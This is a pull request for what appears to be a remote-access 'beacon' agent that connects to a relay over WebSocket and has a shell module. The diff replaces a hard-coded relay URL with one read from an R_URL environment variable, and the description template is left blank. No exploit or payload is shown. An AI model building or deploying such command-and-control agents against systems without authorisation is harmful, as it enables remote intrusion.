### PR TITLE
feat: resolve relay URL from R_URL environment variable at runtime

### DIFF
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -42,11 +42,9 @@ include(${CMAKE_SOURCE_DIR}/cmake/Common.cmake)
 # =============================================================================
 set(BUILD_NUMBER "0" CACHE STRING "Agent build number")
 set(COMMIT_HASH "00000000" CACHE STRING "Agent commit hash")
-set(RELAY_URL "https://relay.nostdlib.workers.dev/agent" CACHE STRING "Relay /agent endpoint the beacon connects to (baked at build; override with -DRELAY_URL=...)")
 list(APPEND PIR_DEFINES
     AGENT_BUILD_NUMBER=${BUILD_NUMBER}
     AGENT_COMMIT_HASH="${COMMIT_HASH}"
-    AGENT_RELAY_URL="${RELAY_URL}"
 )
 
 include(${PIR_ROOT_DIR}/cmake/Target.cmake)

--- a/src/beacon/main.cc
+++ b/src/beacon/main.cc
@@ -2,6 +2,7 @@
 #include "runtime.h"
 #include "websocket_client.h"
 #include "shell.h"
+#include "platform/system/environment.h"
 
 static const CHAR *CommandTypeName(UINT8 type)
 {
@@ -32,13 +33,18 @@ static const CHAR *CommandTypeName(UINT8 type)
     }
 }
 
-#ifndef AGENT_RELAY_URL
-#define AGENT_RELAY_URL "https://relay.nostdlib.workers.dev/agent"
-#endif
-
 INT32 start()
 {
-    const CHAR url[] = AGENT_RELAY_URL;
+    // Resolve the relay URL from the R_URL environment variable at runtime.
+    // There is no fallback: the agent will not run without an explicit endpoint.
+    CHAR urlBuffer[512];
+    USIZE urlLen = Environment::GetVariable("R_URL", Span<CHAR>(urlBuffer, sizeof(urlBuffer)));
+    if (urlLen == 0)
+    {
+        LOG_ERROR("R_URL environment variable is not set; cannot start agent without a relay endpoint");
+        return 0;
+    }
+    Span<const CHAR> urlSpan(urlBuffer, urlLen); // exclude null terminator (ParseUrl bounds on Span size)
 
     Context context;
     UINT32 connectionAttempt = 0;
@@ -60,16 +66,16 @@ INT32 start()
     while (!context.shouldExit)
     {
         connectionAttempt++;
-        LOG_INFO("Connection attempt #%u to %s", connectionAttempt, (PCCHAR)url);
+        LOG_INFO("Connection attempt #%u to %s", connectionAttempt, (PCCHAR)urlBuffer);
 
-        auto createResult = WebSocketClient::Create(url);
+        auto createResult = WebSocketClient::Create(urlSpan);
         if (!createResult)
         {
-            LOG_ERROR("Connection attempt #%u failed: unable to open WebSocket to %s", connectionAttempt, (PCCHAR)url);
+            LOG_ERROR("Connection attempt #%u failed: unable to open WebSocket to %s", connectionAttempt, (PCCHAR)urlBuffer);
             return 0;
         }
         WebSocketClient &wsClient = createResult.Value();
-        LOG_INFO("WebSocket connection established (attempt #%u) to %s", connectionAttempt, (PCCHAR)url);
+        LOG_INFO("WebSocket connection established (attempt #%u) to %s", connectionAttempt, (PCCHAR)urlBuffer);
 
         UINT32 messageCount = 0;
         while (!context.shouldExit)


### PR DESCRIPTION
## Summary

<!-- Brief description of the changes (1-3 sentences) -->

## Type of Change

- [ ] Bug fix
- [ ] New feature / command
- [ ] Refactoring (no functional changes)
- [ ] Documentation
- [ ] Build system / CI
- [ ] Other:

## Platforms Tested

<!-- List the platform-architecture presets you built and tested against -->

- [ ] `windows-x86_64-release`
- [ ] `linux-x86_64-release`
- [ ] `macos-aarch64-release`
- [ ] Other:

## Binary Size Impact

<!-- Required: Report .text section size before and after your change for at least one preset -->
<!-- Use: llvm-size build/release/<platform>/<arch>/output.exe -->

```
Preset: <platform>-<arch>-release
Before: exe XXXXX, bin XXXXX
After:  exe XXXXX, bin XXXXX
Diff:   +/- XXX B
```

## Checklist

- [ ] Build passes with no warnings for at least one preset
- [ ] Post-build PIC verification passes (no `.rdata`/`.rodata`/`.data`/`.bss` sections)
- [ ] Code follows [naming conventions](CONTRIBUTING.md#naming-conventions) and [code style](CONTRIBUTING.md#code-style)
- [ ] Doxygen documentation added for new public APIs
- [ ] No STL, no exceptions, no RTTI
- [ ] `Result<T, Error>` used for all fallible functions
- [ ] Binary size diff reported above
- [ ] README updated (if adding/modifying commands)

## Additional Notes

<!-- Any context, design decisions, trade-offs, or related issues -->
